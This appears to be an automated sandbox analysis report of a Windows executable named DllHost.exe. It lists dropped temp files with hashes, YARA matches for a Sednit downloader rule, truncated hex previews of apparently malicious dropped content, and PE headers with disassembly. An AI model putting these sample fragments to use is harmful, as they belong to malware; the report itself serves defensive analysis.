                                                                                                                                                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):9709
                                                                                                                                                            Entropy (8bit):4.934970090060573
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdJgkjDt4iWN3yBGHc9smgdcU6CkdcU6Cw9smqpOm:Wwib4L+kjh4iUxm44C4Mib4w
                                                                                                                                                            MD5:E241E42B6F038F6760DF6E3ADCE511D8
                                                                                                                                                            SHA1:CE33F612A10E9D6AB1A069604E11C9D198241683
                                                                                                                                                            SHA-256:A25CE53E383B28EE7BF9D79D0A547559A60A23B371DA36D6F1AF766F89C92699
                                                                                                                                                            SHA-512:0272577400F695DE4FB92748017C8753FEBED3E4B4A5EC054255E2E46E1B66B189B887698259C32A8878352FF3CD7E60F37067718BFB13413A5B07BEEB13B9A8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_4ma25vna.lcg.psm1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:1

                                                                                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_na4l2u1f.t0e.ps1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:1

                                                                                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_ni2vhpd0.j3g.ps1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:1

                                                                                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_xl5t5tkm.r3v.psm1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:1

                                                                                                                                                            C:\Windows\Temp\aut3E26.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):25822
                                                                                                                                                            Entropy (8bit):7.676686877584948
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                                                                                                            MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                                                                                                            SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                                                                                                            SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                                                                                                            SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                                                                                                            C:\Windows\Temp\aut61EB.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):25822
                                                                                                                                                            Entropy (8bit):7.676686877584948
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                                                                                                            MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                                                                                                            SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                                                                                                            SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                                                                                                            SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                                                                                                            C:\Windows\Temp\aut8716.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):25822
                                                                                                                                                            Entropy (8bit):7.676686877584948
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                                                                                                            MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                                                                                                            SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                                                                                                            SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                                                                                                            SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                                                                                                            C:\Windows\Temp\autAA1F.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):25822
                                                                                                                                                            Entropy (8bit):7.676686877584948
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                                                                                                            MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                                                                                                            SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                                                                                                            SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                                                                                                            SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                                                                                                            C:\Windows\Temp\klcxefr

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):83514
                                                                                                                                                            Entropy (8bit):3.495672104133364
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                                                                                                            MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                                                                                                            SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                                                                                                            SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                                                                                                            SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Windows\Temp\klcxefr, Author: Florian Roth
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                                                                                                            C:\Windows\Temp\rngmakf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):83514
                                                                                                                                                            Entropy (8bit):3.495672104133364
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                                                                                                            MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                                                                                                            SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                                                                                                            SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                                                                                                            SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Windows\Temp\rngmakf, Author: Florian Roth
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                                                                                                            C:\Windows\Temp\unmloyr

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):83514
                                                                                                                                                            Entropy (8bit):3.495672104133364
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                                                                                                            MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                                                                                                            SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                                                                                                            SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                                                                                                            SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Windows\Temp\unmloyr, Author: Florian Roth
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                                                                                                            C:\Windows\Temp\uvbddbm

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\UpSys.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):83514
                                                                                                                                                            Entropy (8bit):3.495672104133364
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                                                                                                            MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                                                                                                            SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                                                                                                            SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                                                                                                            SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Windows\Temp\uvbddbm, Author: Florian Roth
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                            Entropy (8bit):6.458496741337227
                                                                                                                                                            TrID:
                                                                                                                                                            • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                            File name:DllHost.exe
                                                                                                                                                            File size:451072
                                                                                                                                                            MD5:6368031626da1f0d51bcac43104b123f
                                                                                                                                                            SHA1:5a340a1a3edc0bf03526e677a0415ffd156c139c
                                                                                                                                                            SHA256:11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
                                                                                                                                                            SHA512:442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
                                                                                                                                                            SSDEEP:12288:5TrbdUJPfcw827BePye4sa4D0/EEqAoaq79Troe:53C5Vjdw4snD0/E7Aoa2Tr
                                                                                                                                                            TLSH:27A49E1562A904F8E1B7D37CC9934906E67678160361DBEF03A8D6762F236E05E3EF60
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .[.A...A...A...'...A...'..pA....)..A...4...A...4...A...4...A..z4...A..z4...A...'...A...'...A...'...A...A..aA...4...A...4+..A.

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:00828e8e8686b000

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x1400228f8
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                            Subsystem:windows cui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x62C5B481 [Wed Jul 6 16:12:49 2022 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:6
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:6
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:c7c63cc596fb58b7c13697106af6e6a0

                                                                                                                                                            Entrypoint Preview

                                                                                                                                                            Instruction
                                                                                                                                                            dec eax
                                                                                                                                                            sub esp, 28h
                                                                                                                                                            call 00007F955CAB2DA0h
                                                                                                                                                            dec eax
                                                                                                                                                            add esp, 28h
                                                                                                                                                            jmp 00007F955CAB23A7h
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            dec eax
                                                                                                                                                            sub esp, 28h
                                                                                                                                                            dec ebp
                                                                                                                                                            mov eax, dword ptr [ecx+38h]
                                                                                                                                                            dec eax
                                                                                                                                                            mov ecx, edx
                                                                                                                                                            dec ecx
                                                                                                                                                            mov edx, ecx
                                                                                                                                                            call 00007F955CAB2542h
                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                            dec eax
                                                                                                                                                            add esp, 28h
                                                                                                                                                            ret
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            inc eax
                                                                                                                                                            push ebx
                                                                                                                                                            inc ebp
                                                                                                                                                            mov ebx, dword ptr [eax]
                                                                                                                                                            dec eax
                                                                                                                                                            mov ebx, edx
                                                                                                                                                            inc ecx
                                                                                                                                                            and ebx, FFFFFFF8h
                                                                                                                                                            dec esp
                                                                                                                                                            mov ecx, ecx
                                                                                                                                                            inc ecx
                                                                                                                                                            test byte ptr [eax], 00000004h
                                                                                                                                                            dec esp
                                                                                                                                                            mov edx, ecx
                                                                                                                                                            je 00007F955CAB2545h
                                                                                                                                                            inc ecx
                                                                                                                                                            mov eax, dword ptr [eax+08h]
                                                                                                                                                            dec ebp
                                                                                                                                                            arpl word ptr [eax+04h], dx
                                                                                                                                                            neg eax
                                                                                                                                                            dec esp
                                                                                                                                                            add edx, ecx
                                                                                                                                                            dec eax
                                                                                                                                                            arpl ax, cx
                                                                                                                                                            dec esp
                                                                                                                                                            and edx, ecx
                                                                                                                                                            dec ecx
                                                                                                                                                            arpl bx, ax
                                                                                                                                                            dec edx
                                                                                                                                                            mov edx, dword ptr [eax+edx]
                                                                                                                                                            dec eax
                                                                                                                                                            mov eax, dword ptr [ebx+10h]
